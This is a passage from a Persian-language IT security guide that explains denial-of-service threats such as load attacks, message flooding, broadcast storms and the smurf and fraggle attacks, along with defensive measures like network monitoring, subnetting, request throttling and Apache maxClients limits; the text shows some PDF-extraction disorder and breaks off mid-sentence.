‫ﺍﻳﻦ ﻧﻮﻉ ﺣﻤﻠﻪ ﻣﻤﻜﻦ ﺍﺳﺖ ﺻﺮﻓﹰﺎ ﺑﺮﺍﻱ ﻣﻨﺤﺮﻑ ﻛﺮﺩﻥ ﺗﻮﺟﻬﺎﺕ ﻭ ﻳﺎ ﻗﻄﻊ ﺧﻄﻮﻁ ﺍﺭﺗﺒﺎﻃﻲ ﺍﻧﺠﺎﻡ ﮔﻴﺮﺩ‪ ،‬ﺩﺭﺣﺎﻟﻴﻜﻪ ﻋﻤﻞ ﺩﻳﮕﺮﻱ ‪ -‬ﻣﺜ ﹰ‬
‫ﺑﻤﺐﮔﺬﺍﺭﻱ ﺩﺭ ﻳﻚ ﺍﺗﻮﻣﻮﺑﻴﻞ ‪ -‬ﺩﺭﺣﺎﻝ ﻭﻗﻮﻉ ﺍﺳﺖ‪.‬‬
‫ﺷﻤﺎ ﻣﻲﺗﻮﺍﻧﻴﺪ ﺍﺯ ﻳﻚ ﻧﺎﻇﺮ ﺷﺒﻜﻪ ﺑﺮﺍﻱ ﻛﺸﻒ ﻧﻮﻉ ﻭ ﮔﺎﻫﻲ ﻣﺒﺪﺃ ﺣﻤﻼﺕ ﺑﺎﺭﮔﺬﺍﺭﻱ ﺍﺳﺘﻔﺎﺩﻩ ﻛﻨﻴﺪ‪ .‬ﻓﻬﺮﺳﺘﻲ ﺍﺯ ﻣﺎﺷﻴﻨﻬﺎ ﻭ ﺁﺩﺭﺳﻬﺎﻱ‬
‫ﺳﺨﺖﺍﻓﺰﺍﺭﻱ ﺁﻧﻬﺎ )ﺁﺩﺭﺱ ﺭﻭﻱ ﻛﺎﺭﺕ ‪ ،ethernet‬ﻭ ﻧﻪ ﺁﺩﺭﺳﻬﺎﻱ ‪ (IP‬ﻣﻲﺗﻮﺍﻧﺪ ﺑﻪ ﺷﻤﺎ ﺩﺭ ﺭﺩﻳﺎﺑﻲ ﻣﺒﺪﺃ ﻣﺸﻜﻞ ‪ -‬ﺍﮔﺮ ﺍﺯ ﺩﺍﺧﻞ ﺷﺒﻜﺔ ﺧﻮﺩﺗﺎﻥ‬
‫ﺑﺎﺷﺪ ‪ -‬ﻛﻤﻚ ﻛﻨﺪ‪ .‬ﻫﻨﮕﺎﻡ ﺭﺩﻳﺎﺑﻲ ﻣﺸﻜﻞ‪ ،‬ﻣﻨﻔﺼﻞ ﻛﺮﺩﻥ ﺷﺒﻜﻪ ﻭ ﺯﻳﺮﺷﺒﻜﻪﻫﺎ ﻣﻲﺗﻮﺍﻧﺪ ﺩﺭ ﺍﻧﺠﺎﻡ ﻛﺎﺭ ﻛﻤﻚ ﻛﻨﺪ‪ .‬ﺍﮔﺮ ﺩﺭ ﺩﻳﻮﺍﺭﺓ ﺁﺗﺶ ﻳﺎ‬
‫ﻣﺴﻴﺮﻳﺎﺏ ﺧﻮﺩ ﻗﺎﺑﻠﻴﺖ ﺛﺒﺖ ﺩﺍﺷﺘﻪ ﺑﺎﺷﻴﺪ‪ ،‬ﺑﻪ ﺳﺮﻋﺖ ﻣﻲﺗﻮﺍﻧﻴﺪ ﺑﻔﻬﻤﻴﺪ ﻛﻪ ﺣﻤﻠﻪ ﺍﺯ ﺩﺍﺧﻞ ﺷﺒﻜﻪ ﺑﻮﺩﻩ ﻳﺎ ﺧﺎﺭﺝ ﺁﻥ؛ ﭼﻮﻥ ﻧﻤﻲﺗﻮﺍﻥ ﺑﻪ‬
‫ﺁﺩﺭﺱ ‪ IP‬ﺑﺴﺘﻪﻫﺎﻱ ﺍﺭﺳﺎﻟﻲ ﺍﻃﻤﻴﻨﺎﻥ ﻛﺮﺩ‪.‬‬
‫ﺍﮔﺮﭼﻪ ﻧﻤﻲﺗﻮﺍﻧﻴﺪ ﺍﺯ ﺣﻤﻼﺕ ﺑﺎﺭﮔﺬﺍﺭﻱ ﻣﻤﺎﻧﻌﺖ ﺑﻌﻤﻞ ﺁﻭﺭﻳﺪ‪ ،‬ﺍﻣﺎ ﺍﻗﺪﺍﻣﺎﺕ ﺯﻳﺎﺩﻱ ﻭﺟﻮﺩ ﺩﺍﺭﺩ ﻛﻪ ﺑﺎ ﺑﻜﺎﺭﮔﻴﺮﻱ ﺁﻧﻬﺎ ﻣﻲﺗﻮﺍﻧﻴﺪ ﺻﺪﻣﺎﺕ‬
‫ﻭﺍﺭﺩﻩ ﺭﺍ ﺑﻪ ﺣﺪﺍﻗﻞ ﺭﺳﺎﻧﺪﻩ ﻳﺎ ﺳﻴﺴﺘﻢ ﺧﻮﺩ ﺭﺍ ﺩﺭ ﺑﺮﺍﺑﺮ ﺁﻧﻬﺎ ﻣﻘﺎﻭﻡﺗﺮ ﺳﺎﺯﻳﺪ‪.‬‬

‫ﺁﻣﺎﺩﮔﻲ ﺑﺮﺍﻱ ﻣﻘﺎﺑﻠﻪ ﺑﺎ ﺣﻤﻠﻪ‬


‫ﺑﺎ ﻧﺼﺐ ﺳﻴﺴﺘﻤﻬﺎﻱ ﻧﺎﻇﺮ‪ ،‬ﺛﺒﺖﻛﻨﻨﺪﻩ ﻭ ﺳﺎﻳﺮ ﺍﻧﻮﺍﻉ ﺳﻴﺴﺘﻤﻬﺎﻱ ﺗﺤﻠﻴﻞ‪ ،‬ﺩﺭﺻﻮﺭﺕ ﻭﻗﻮﻉ ﺣﻤﻠﻪ ﺑﻪ ﺳﺮﻋﺖ ﻗﺎﺩﺭ ﺑﻪ ﺷﻨﺎﺳﺎﻳﻲ ﻧﻮﻉ ﺣﻤﻠـﻪ ﻭ‬
‫ﺑﺎ ﻛﻤﻲ ﺍﻗﺒﺎﻝ‪ ،‬ﺗﻌﻴﻴﻦ ﻣﺒﺪﺃ ﺁﻥ ﻧﻴﺰ ﺧﻮﺍﻫﻴﺪ ﺑﻮﺩ‪ .‬ﺭﻭﻱ ﺯﻳﺮﺷﺒﻜﺔ ﺧﻮﺩ ﭼﻨﺪ ﻧﻈﺎﺭﺗﮕﺮ ﺍﺿﺎﻓﻪ )ﻭ ﻣﺤﺎﻓﻈﺖﺷﺪﻩ( ﺩﺍﺷـﺘﻪ ﺑﺎﺷـﻴﺪ ﺗـﺎ ﺑﻮﺳـﻴﻠﺔ ﺁﻧﻬـﺎ‬
‫ﺑﺘﻮﺍﻧﻴﺪ ﺑﻪ ﺳﺮﻋﺖ ﺗﺮﺍﻓﻴﻚ ﺷﺒﻜﻪ ﺭﺍ ﺑﺮﺭﺳﻲ ﻧﻤﺎﻳﻴﺪ‪ .‬ﻓﻬﺮﺳﺘﻲ ﺍﺯ ﺁﺩﺭﺳﻬﺎﻱ ‪ IP‬ﻭ ﻣﺎﺷﻴﻨﻬﺎﻱ ﺳﺨﺖﺍﻓﺰﺍﺭﻱ ﻧﻴﺰ ﺩﻡ ﺩﺳﺖ ﺩﺍﺷـﺘﻪ ﺑﺎﺷـﻴﺪ ﺗـﺎ‬
‫ﻣﺸﺎﻫﺪﺓ ﺟﺮﻳﺎﻥ ﺑﺴﺘﻪﻫﺎ ﺑﻬﺘﺮ ﺑﺘﻮﺍﻧﺪ ﺑﻪ ﺷﻤﺎ ﺩﺭ ﺗﺸﺨﻴﺺ ﻣﻨﺸﺎﺀ ﺑﺎﺭﮔﺬﺍﺭﻱ ﻛﻤﻚ ﻛﻨﺪ‪.‬‬

‫ﺗﻔﻜﻴﻚ ﺷﺒﻜﻪ ﺑﻪ ﭼﻨﺪ ﺯﻳﺮﺷﺒﻜﻪ‬


‫ﺑﺎ ﺍﻧﺠﺎﻡ ﺍﻳﻨﻜﺎﺭ ﺩﺭﺻﻮﺭﺗﻴﻜﻪ ﻳﻚ ﺯﻳﺮﺷﺒﻜﻪ ﺩﺭ ﺍﺛﺮ ﺣﻤﻠﻪ ﻳﺎ ﺑﺼﻮﺭﺕ ﺗﺼﺎﺩﻓﻲ ﺍﺯ ﻛﺎﺭ ﺑﻴﺎﻓﺘﺪ‪ ،‬ﻫﻤﺔ ﻣﺎﺷﻴﻨﻬﺎ ﺍﺯ ﻛﺎﺭ ﻧﻤﻲﺍﻓﺘﻨﺪ‪.‬‬

‫ﺗﻬﻴﺔ ﭼﻨﺪ ﺍﺗﺼﺎﻝ ﺍﻳﻨﺘﺮﻧﺖ ﺑﺮﺍﻱ ﺳﺎﺯﻣﺎﻥ‬


‫ﺑﺮﺧﻲ ﺍﺯ ﺍﺗﺼﺎﻟﻬﺎ ﻣﻤﻜﻦ ﺍﺳﺖ ﺍﻋﻼﻥ ﻋﻤﻮﻣﻲ ﻧﺸﻮﻧﺪ‪ ،‬ﺍﻣﺎ ﺑﺮﺍﻱ ﺭﻭﺯ ﻣﺒﺎﺩﺍ ﮐﻨﺎﺭ ﮔﺬﺍﺷﺘﻪ ﺷﺪﻩ ﺑﺎﺷﻨﺪ‪.‬‬
‫‪٤١٣‬‬ ‫ﺑﺨﺶ ﭘﻨﺠﻢ‪ :‬ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ﻭ ﺭﺍﻫﺒﺮﺍﻥ ﻓﻨﻲ‬

‫ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﻣﻔﻬﻮﻡ ﺩﺭﻳﭽﻪ ﺩﺭ ﺑﺮﻧﺎﻣﻪﻫﺎﻱ ﻛﺎﺭﺑﺮﺩﻱ‬


‫ﺑﺮﺧﻲ ﺍﺯ ﺑﺮﻧﺎﻣﻪﻫﺎ ﺍﺻﻄﻼﺣﹰﺎ ﺩﺍﺭﺍﻱ ﻳﻚ "ﺩﺭﻳﭽﺔ ﻭﺭﻭﺩﻱ" ﻫﺴﺘﻨﺪ‪ ،‬ﺗﺎ ﺍﮔﺮ ﺗﻌﺪﺍﺩ ﺑـﻴﺶ ﺍﺯ ﺍﻧـﺪﺍﺯﻩﺍﻱ ﺩﺭﺧﻮﺍﺳـﺖ ﺩﺭ ﻣـﺪﺕ ﺯﻣـﺎﻥ ﻛﻮﺗـﺎﻫﻲ‬
‫ﺩﺭﻳﺎﻓﺖ ﻛﺮﺩﻧﺪ‪ ،‬ﺷﺮﻭﻉ ﺑﻪ ﺭﺩ ﺩﺭﺧﻮﺍﺳﺘﻬﺎ ﻭ ﺛﺒﺖ ﭘﻴﻐﺎﻣﻲ ﻣﺒﻨﻲ ﺑﺮ ﺍﺯ ﻛﺎﺭ ﺍﻓﺘﺎﺩﻥ ﺳﺮﻭﻳﺲ ﻛﻨﻨﺪ‪ .‬ﺍﻳﻦ ﻋﻤﻞ ﺑﺎ ﺍﻳﻦ ﻓﺮﺽ ﺍﻧﺠﺎﻡ ﻣﻲﭘﺬﻳﺮﺩ ﻛﻪ‬
‫ﻳﻚ ﺍﺷﻜﺎﻝ‪ ،‬ﺍﻳﻦ ﺗﺮﺍﻓﻴﻚ ﺭﺍ ﺑﻮﺟﻮﺩ ﺁﻭﺭﺩﻩ ﺍﺳﺖ‪ .‬ﺍﺛﺮ ﺟﺎﻧﺒﻲ ﺍﻳﻨﻜﺎﺭ ﺍﻳﻦ ﺍﺳﺖ ﻛﻪ ﺍﻳﻦ ﺳﺮﻭﻳﺲ ﻫﻤﺎﻧﻨﺪ ﻭﻗﺘﻲ ﻛـﻪ ﺗﻤـﺎﻡ ﺗﻘﺎﺿـﺎﻫﺎ ﺭﺍ ﺑـﺮﺍﻱ‬
‫ﭘﺮﺩﺍﺯﺵ ﻣﻲﭘﺬﻳﺮﻓﺖ ﻭ ﺍﺯ ﻛﺎﺭ ﻣﻲﺍﻓﺘﺎﺩ‪ ،‬ﻏﻴﺮﻓﻌﺎﻝ ﻣﻲﺷﻮﺩ‪ .‬ﺑﻪ ﻫﺮﺣـﺎﻝ ﺑـﻪ ﻛﻤـﻚ ﺍﻳـﻦ ﺭﻭﺵ ﻣـﻲﺗـﻮﺍﻥ ﺟﻠـﻮﻱ ﺍﺯ ﻛـﺎﺭ ﺍﻓﺘـﺎﺩﻥ ﻛﺎﻣـﻞ‬
‫ﺳﺮﻭﻳﺲﺩﻫﻨﺪﻩ ﺭﺍ ﮔﺮﻓﺖ ﻭ ﺩﺭ ﻛﻨﺎﺭ ﺁﻥ ﺳﺎﺑﻘﻪﺍﻱ ﺍﺯ ﺯﻣﺎﻥ ﻭﻗﻮﻉ ﺍﻳﻦ ﻣﺸﻜﻞ ﻧﻴﺰ ﺑﻪ ﺛﺒﺖ ﺭﺳﺎﻧﺪ‪.‬‬

‫ﺍﻃﻤﻴﻨﺎﻥ ﺍﺯ ﻣﻌﻘﻮﻝ ﺑﻮﺩﻥ ﻣﺤﺪﻭﺩﻳﺘﻬﺎﻱ ﻣﻮﺟﻮﺩ ﺩﺭ ﻓﺎﻳﻠﻬﺎﻱ ﭘﻴﻜﺮﺑﻨﺪﻱ‬


‫ﺍﮔﺮ ﺷﻤﺎ ﺳﺮﻭﻳﺲﺩﻫﻨﺪﺓ ﻭﺏ ‪ Apache‬ﺭﺍ ﺍﺟﺮﺍ ﻛﺮﺩﻩ ﺑﺎﺷﻴﺪ ﺣﺘﻤﹰﺎ ﺩﻳﺪﻩﺍﻳﺪ ﻛﻪ ﺍﻓﺰﺍﻳﺶ ﻧﺎﮔﻬﺎﻧﻲ ﺗﻌﺪﺍﺩ ﺩﺭﺧﻮﺍﺳﺘﻬﺎ ﺑﻪ ﺳﺮﻭﻳﺲﺩﻫﻨﺪﻩ ﺑﺎﻋﺚ‬
‫"‪ "fork‬ﺷﺪﻥ ﺗﻌﺪﺍﺩ ﺯﻳﺎﺩﻱ ﭘﺮﺩﺍﺯﺓ ‪ http‬ﻣﻲﺷﻮﺩ‪ .‬ﺩﺭ ﺍﻳﻦ ﺳﺮﻭﻳﺲﺩﻫﻨﺪﻩ ﺗﻌﺪﺍﺩ ﻛﻞ ﺍﺗﺼﺎﻟﻬﺎﻱ ﻣﺠﺎ ﹺﺯ ﻫﻤﺰﻣﺎﻥ ﺑـﺎ ﭘـﺎﺭﺍﻣﺘﺮ ‪maxClients‬‬
‫ﺩﺭ ﻓﺎﻳﻞ ﭘﻴﻜﺮﺑﻨﺪﻱ ‪ Apache‬ﺑﻪ ﻧﺎﻡ ‪ httpd.conf‬ﻛﻨﺘﺮﻝ ﻣﻲﮔﺮﺩﺩ‪.‬‬
‫ﺩﺭ ﺑﺴﻴﺎﺭﻱ ﺍﺯ ﻧﺴﺨﻪﻫﺎﻱ ‪ Apache‬ﻣﻘﺪﺍﺭ ‪ maxClients‬ﺑﺼﻮﺭﺕ ﭘﻴﺶﻓﺮﺽ ﻋﺪﺩ ‪ ٢٠٠‬ﺍﺳﺖ‪ ،‬ﺑﻪ ﺍﻳﻦ ﻣﻌﻨﻲ ﻛﻪ ﺣﺪﺍﻛﺜﺮ ‪ ٢٠٠‬ﭘـﺮﺩﺍﺯﺓ‬
‫‪ http‬ﻣﺠﺰﺍ ﻣﻲﺗﻮﺍﻧﻨﺪ ﺑﺼﻮﺭﺕ ﻫﻤﺰﻣﺎﻥ ﻭﺟﻮﺩ ﺩﺍﺷﺘﻪ ﺑﺎﺷﻨﺪ‪ .‬ﺍﮔﺮ ﻫﺮﻳﻚ ﺍﺯ ﭘﺮﺩﺍﺯﻩﻫﺎﻱ ‪ httpd‬ﺣﺎﻓﻈﻪﺍﻱ ﻣﻌﺎﺩﻝ ‪ ٨‬ﻣﮕﺎﺑﺎﻳﺖ ﺩﺍﺷﺘﻪ ﺑﺎﺷـﺪ‪،‬‬
‫ﺩﺭﺣﺎﻟﺖ ﺣﺪﺍﻛﺜﺮ ‪ ١،٦‬ﮔﻴﮕﺎﺑﺎﻳﺖ ﻓﻀﺎﻱ ‪ swap‬ﺭﺍ ﺍﺷﻐﺎﻝ ﻣﻲﻛﻨﻨﺪ‪ .‬ﺍﻣﺎ ﺍﮔﺮ ﻫﺮﻳﻚ ﺍﺯ ﭘﺮﺩﺍﺯﻩﻫﺎﻱ ‪ ٢٠ httpd‬ﻣﮕﺎﺑﺎﻳﺖ ﺑﺎﺷﻨﺪ‪ ،‬ﺩﺭ ﺁﻧﺼﻮﺭﺕ‬
‫ﺷﻤﺎ ﺑﻪ ‪ ٤٠‬ﮔﻴﮕﺎﺑﺎﻳﺖ ﻓﻀﺎﻱ ‪ swap‬ﻧﻴﺎﺯ ﺩﺍﺭﻳﺪ؛ ﻛﻪ ﺷﺎﻳﺪ ﺍﺯ ﻛﻞ ﻇﺮﻓﻴﺖ ﺣﺎﻓﻈﺔ ﺳﻴﺴﺘﻢ ﺷﻤﺎ ﻫﻢ ﺑﻴﺸﺘﺮ ﺑﺎﺷﺪ‪.‬‬

‫‪٣١٠‬‬
‫ﺳﻴﻞ ﭘﻴﺎﻣﻬﺎ‬
‫ﺳﻴﻞ ﭘﻴﺎﻣﻬﺎ ﻭﻗﺘﻲ ﺍﺗﻔﺎﻕ ﻣﻲﺍﻓﺘﺪ ﻛﻪ ﻛﺎﺭﺑﺮﻱ ﺑﺎ ﺳﺮﺍﺯﻳﺮﻛﺮﺩﻥ ﺗﻌﺪﺍﺩ ﺯﻳﺎﺩﻱ ﭘﻴﺎﻣﻬﺎﻱ ﺷﺒﻜﻪﺍﻱ ﺑﻪ ﺁﺩﺭﺱ ﻳﻚ ﺳﻴـﺴﺘﻢ‪ ،‬ﺳـﺮﻋﺖ ﭘـﺮﺩﺍﺯﺵ‬
‫ﺁﻧﺮﺍ ﺩﺭ ﺷﺒﻜﻪ ﻛﻢ ﻣﻲﻛﻨﺪ ﺗﺎ ﺍﺯ ﻋﻤﻠﻜﺮﺩ ﻋﺎﺩﻱ ﺁﻥ ﺟﻠﻮﮔﻴﺮﻱ ﻧﻤﺎﻳﺪ‪ .‬ﺍﻳﻦ ﭘﻴﺎﻣﻬﺎ ﻣﻤﻜﻦ ﺍﺳﺖ ﺩﺭﺧﻮﺍﺳﺘﻬﺎﻳﻲ ﺑﺮﺍﻱ ﺳﺮﻭﻳﺲ ﻓﺎﻳﻞ‪ ،‬ﺳﺮﻭﻳﺲ‬
‫ﻭﺭﻭﺩ‪ ،‬ﻭ ﻳﺎ ﺩﺭﺧﻮﺍﺳﺘﻬﺎﻱ ﺳﺎﺩﺓ ﭘﮋﻭﺍﻙ ﺑﺎﺷﻨﺪ‪ .‬ﺍﻳﻦ ﺳﻴﻞ ﭘﻴﺎﻣﻬﺎ ﺑﻪ ﻫﺮ ﺷﻜﻠﻲ ﻛﻪ ﺑﺎﺷﺪ ﺑﺎﻋﺚ ﻣﻲﺷﻮﺩ ﺑﻴﺸﺘﺮ ﻣﻨـﺎﺑﻊ ﺭﺍﻳﺎﻧـﺔ ﻣﻘـﺼﺪ ﺻـﺮﻑ‬
‫ﭘﺎﺳﺨﮕﻮﻳﻲ ﺑﻪ ﺁﻧﻬﺎ ﺷﻮﺩ‪ .‬ﺩﺭ ﺑﺪﺗﺮﻳﻦ ﺣﺎﻻﺕ ﺍﻳﻦ ﺳﻴﻞ ﻣﻤﻜﻦ ﺍﺳﺖ ﺑﺎﻋﺚ ﺷﻮﺩ ﻣﺎﺷﻴﻦ ﺑﻌﻠﺖ ﻣﻮﺍﺟﻬﻪ ﺑﺎ ﺧﻄﺎﻫﺎﻱ ﻧﺎﺷﻲ ﺍﺯ ﻛﻤﺒﻮﺩ ﺣﺎﻓﻈﻪ‬
‫ﺑﺮﺍﻱ ﺫﺧﻴﺮﺓ ﺑﺴﺘﻪﻫﺎﻱ ﻭﺭﻭﺩﻱ ﺍﺯ ﻛﺎﺭ ﺑﻴﺎﻓﺘﺪ‪ .‬ﺩﺭ ﺍﻳﻨﺼﻮﺭﺕ ﺍﻳﻦ ﺣﻤﻠﻪ ﺑﺎﻋﺚ ﺍﻧﺴﺪﺍﺩ ﺩﺳﺘﺮﺳﻲ ﺑﻪ ﺳﺮﻭﻳﺲﺩﻫﻨﺪﻩﻫﺎﻱ ﺷﺒﻜﻪ ﺧﻮﺍﻫﺪ ﺷﺪ‪.‬‬
‫ﺦ ﺑﻬﻨﮕﺎﻡ ﺩﻫـﺪ‪ .‬ﻣﻬـﺎﺟﻢ ﺑـﺎ ﺍﺳـﺘﻔﺎﺩﻩ ﺍﺯ ﺍﻳـﻦ ﻣـﺴﺌﻠﻪ ﻣـﻲﺗﻮﺍﻧـﺪ‬
‫ﻳﻚ ﺳﺮﻭﻳﺲﺩﻫﻨﺪﺓ ﺳﻴﻞﺯﺩﻩ ﻣﻤﻜﻦ ﺍﺳﺖ ﻧﺘﻮﺍﻧﺪ ﺑﻪ ﭘﻴﺎﻣﻬﺎﻱ ﺷﺒﻜﻪ ﭘﺎﺳ ﹺ‬
‫ﻼ ﻣﻲﺗﻮﺍﻧﺪ ﻳﻚ ﺳﺮﻭﻳﺲﺩﻫﻨﺪﺓ ‪ NIS‬ﺭﺍ ﺳﻴﻞﺯﺩﻩ ﻛﻨـﺪ‬ ‫ﺑﺮﻧﺎﻣﻪﺍﻱ ﺑﻨﻮﻳﺴﺪ ﻛﻪ ﺑﺠﺎﻱ ﺳﺮﻭﻳﺲﺩﻫﻨﺪﻩ ﺑﻪ ﭘﻴﺎﻣﻬﺎ ﻭ ﺩﺭﺧﻮﺍﺳﺘﻬﺎ ﭘﺎﺳﺦ ﺩﻫﺪ‪ .‬ﻣﺜ ﹰ‬
‫ﻭ ﺳﭙﺲ ﭘﺎﺳﺨﻬﺎﻱ ﺧﻮﺩ ﺭﺍ ﺑﺮﺍﻱ ﺩﺭﺧﻮﺍﺳﺘﻬﺎﻱ ‪ - NIS‬ﺧﺼﻮﺻﹰﺎ ﺩﺭﺧﻮﺍﺳﺖ ﺭﻣﺰ ﻋﺒﻮﺭ ‪ -‬ﺻﺎﺩﺭ ﻧﻤﺎﻳﺪ‪.‬‬
‫ﺑﺨﺶ ﭘﻨﺠﻢ‬

‫ﻧﻮﻉ ﻣﺸﺎﺑﻬﻲ ﺍﺯ ﺣﻤﻠﻪ‪ ،‬ﻃﻮﻓﺎﻥ ﻋﺎﻡﮔﺴﺘﺮ‪ ٣١١‬ﺍﺳﺖ‪ .‬ﺑﺎ ﻃﺮﺍﺣﻲ ﺩﻗﻴﻖ ﻭ ﻣﺎﻫﺮﺍﻧﺔ ﭘﻴﺎﻣﻬﺎﻱ ﺷﺒﻜﻪ‪ ،‬ﻣﻲﺗﻮﺍﻧﻴﺪ ﭘﻴـﺎﻣﻲ ﺑـﺴﺎﺯﻳﺪ ﻛـﻪ ﻫـﺮ ﺭﺍﻳﺎﻧـﺔ‬
‫ﺩﺭﻳﺎﻓﺖﻛﻨﻨﺪﻩ ﺭﺍ ﻭﺍﺩﺍﺭ ﺑﻪ ﭘﺎﺳﺦ ﻭ ﻳﺎ ﺍﺭﺳﺎﻝ ﻣﺠﺪﺩ ﺁﻥ ﻛﻨﺪ‪ .‬ﺩﺭﻧﺘﻴﺠﺔ ﺍﻳﻦ ﺣﻤﻠﻪ‪ ،‬ﺷﺒﻜﻪ ﺍﺷﺒﺎﻉ ﺷﺪﻩ ﻭ ﻏﻴﺮﻗﺎﺑﻞ ﺍﺳﺘﻔﺎﺩﻩ ﻣـﻲﮔـﺮﺩﺩ‪ .‬ﻗﺒـﻞ ﺍﺯ‬
‫ﺍﻭﺍﺧﺮ ﺩﻫﺔ ‪ ١٩٩٠‬ﻃﻮﻓﺎﻧﻬﺎﻱ ﻋﺎﻡﮔﺴﺘﺮ ﺍﺯ ﺍﺷﻜﺎﻻﺕ ﺳﺨﺖﺍﻓﺰﺍﺭﻱ ﻭ ﻳﺎ ﻧﺮﻡﺍﻓﺰﺍﺭﻱ ﻣﺤﺼﻮﻻﺕ ﺩﺭﺣﺎﻝ ﺳﺎﺧﺘﻲ ﻛﻪ ﺣﺎﻭﻱ ﺍﺷﻜﺎﻻﺕ ﺑﻮﺩﻧـﺪ‬
‫ﻭ ﻳﺎ ﭘﻴﮑﺮﺑﻨﺪﻱ ﻧﺎﺩﺭﺳﺘﻲ ﺩﺍﺷﺘﻨﺪ ﻧﺎﺷﻲ ﻣﻲﺷﺪ‪ ،‬ﺍﻣﺎ ﺍﻛﻨﻮﻥ ﺍﻳﻦ ﺍﻣﻜﺎﻥ ﻭﺟﻮﺩ ﺩﺍﺭﺩ ﻛﻪ ﻳﻚ ﻃﻮﻓﺎﻥ ﻋﺎﻡﮔﺴﺘﺮ ﺭﺍ ﺑﻄﻮﺭ ﻋﻤﺪﻱ ﺍﻳﺠـﺎﺩ ﻛـﺮﺩ ﻭ‬
‫ﺣﻤﻼﺕ ﻣﻌﺮﻭﻑ ﺑﻪ ‪ smurf‬ﻭ ‪ fraggle‬ﻧﻴﺰ ﻧﻤﻮﻧﻪﻫﺎﻳﻲ ﺍﺯ ﻫﻤﻴﻦ ﻗﺒﻴﻞ ﻫﺴﺘﻨﺪ‪.‬‬
‫ﭘﺨﺶ ﭘﻴﺎﻣﻬﺎﻱ ﺑﺎ ﻗﺎﻟﺐ ﺍﺷﺘﺒﺎﻩ ﻧﻴﺰ ﻣﻲﺗﻮﺍﻧﺪ ﻣﻮﺟﺐ ﺗﻮﻗﻒ ﻛﺎﺭ ﺭﺍﻳﺎﻧﻪﻫﺎﻱ ﻳﻚ ﺷﺒﻜﻪ ﮔﺮﺩﺩ‪ .‬ﺍﮔﺮ ﻫﺮ ﻳﻚ ﺍﺯ ﺭﺍﻳﺎﻧﻪﻫﺎ ﺑﮕﻮﻧـﻪﺍﻱ ﭘﻴﻜﺮﺑﻨـﺪﻱ‬
‫ﺷﺪﻩ ﺑﺎﺷﻨﺪ ﻛﻪ ﭘﻴﺎﻣﻬـﺎﻱ ﻧﺎﻣﻨﺎﺳـﺐ ﺭﺍ ﺭﻭﻱ ﺩﻳـﺴﻚ ﺛﺒـﺖ ﻛﻨﻨـﺪ‪ ،‬ﻃﻮﻓﺎﻧﻬـﺎ ﻣـﻲﺗﻮﺍﻧﻨـﺪ ﺁﻧﻘـﺪﺭ ﭘﻴـﺎﻡ ﺗﻮﻟﻴـﺪ ﻛﻨﻨـﺪ ﻛـﻪ ﺩﺭ ﻧﺘﻴﺠـﺔ ﺁﻧﻬـﺎ‬
‫ﺳﺮﻭﻳﺲﮔﻴﺮﻧﺪﻩﻫﺎ ﻗﺎﺩﺭ ﺑﻪ ﺍﻧﺠﺎﻡ ﻫﻴﭻ ﻛﺎﺭﻱ ﺑﺠﺰ ﭘﺮﺩﺍﺯﺵ ﻭ ﺛﺒﺖ ﺧﻄﺎﻫﺎ ﻧﺒﺎﺷﻨﺪ‪.‬‬

‫‪310 Message Flooding‬‬


‫‪311 Broadcast Storm‬‬
‫ﺭﺍﻫﻨﻤﺎﻱ ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ‬ ‫‪٤١٤‬‬

‫ﺩﺭ ﺍﻳﻨﺠﺎ ﻫﻢ ﺩﺍﺷﺘﻦ ﻳﻚ ﺭﺍﻳﺎﻧﺔ ﻣﺠﺰﺍ ﺑﺮﺍﻱ ﻧﻈﺎﺭﺕ ﻭ ﺗﻔﻜﻴﻚ ﺷﺒﻜﻪ ﺑﻪ ﭼﻨﺪ ﺯﻳﺮﺷﺒﻜﻪ ﻣﻲﺗﻮﺍﻧﺪ ﺑﻪ ﻣﻘﺎﺑﻠﻪ ﺑﺎ ﺍﻳﻦ ﺩﺳﺘﻪ ﻣـﺸﻜﻼﺕ ﻛﻤـﻚ‬
‫ﻛﻨﺪ‪ ،‬ﻫﺮﭼﻨﺪ ﻛﻪ ﻫﻴﭽﻜﺪﺍﻡ ﺍﺯ ﺍﻳﻦ ﺭﺍﻩﺣﻠﻬﺎ ﻗﺎﺩﺭ ﺑﻪ ﺟﻠﻮﮔﻴﺮﻱ ﻛﺎﻣﻞ ﺍﺯ ﺍﻳﻦ ﻣـﺸﻜﻼﺕ ﻧﻴـﺴﺘﻨﺪ‪ .‬ﻫﻤﭽﻨـﻴﻦ ﺑﺮﺧـﻲ ﺍﺯ ﺩﻳـﻮﺍﺭﻩﻫـﺎﻱ ﺁﺗـﺶ‬
‫ﻝ ﺳﺮﻋﺖ ﺍﺗﺼﺎﻝ" ﺍﺯ ﺗﺄﺛﻴﺮ ﺍﻳﻦ ﺣﻤﻼﺕ ﺑﻜﺎﻫﻨﺪ‪ .‬ﺑﺮﻧﺎﻣـﺔ ‪ netfilter‬ﺩﺭ‬‫ﻏﺮﺑﺎﻝﺳﺎﺯ ﺑﺴﺘﻪﻫﺎ )ﺳﺨﺖﺍﻓﺰﺍﺭﻱ ﻳﺎ ﻣﺒﺘﻨﻲ ﺑﺮ ﻣﻴﺰﺑﺎﻥ( ﻣﻲﺗﻮﺍﻧﻨﺪ ﺑﺎ "ﻛﻨﺘﺮ ﹺ‬
‫ﻫﺴﺘﺔ ﺳﻴﺴﺘﻢﻋﺎﻣﻞ ‪ Linux 2.4‬ﻧﻤﻮﻧﺔ ﺧﻮﺑﻲ ﺍﺯ ﺍﻳﻦ ﻗﺒﻴﻞ ﺑﺮﻧﺎﻣﻪﻫﺎ ﺍﺳﺖ‪.‬‬
‫ﭘﻴﻜﺮﺑﻨﺪﻱ ﺻﺤﻴﺢ ﺗﻤﺎﻡ ﺩﻳﻮﺍﺭﻩﻫﺎﻱ ﺁﺗﺶ ﻭ ﻣﺴﻴﺮﻳﺎﺑﻬﺎ ﺑﺮﺍﻱ ﺟﻠﻮﮔﻴﺮﻱ ﺍﺯ ﺍﺭﺳﺎﻝ ﭘﻴﺎﻣﻬﺎﻱ ﻋﺎﻡﮔـﺴﺘﺮ ﺍﺯ ﻣﻴﺰﺑﺎﻧﻬـﺎﻱ ﻏﻴﺮﻣﺠـﺎﺯ‪ ،‬ﺑـﺴﻴﺎﺭ ﺑـﺎ‬
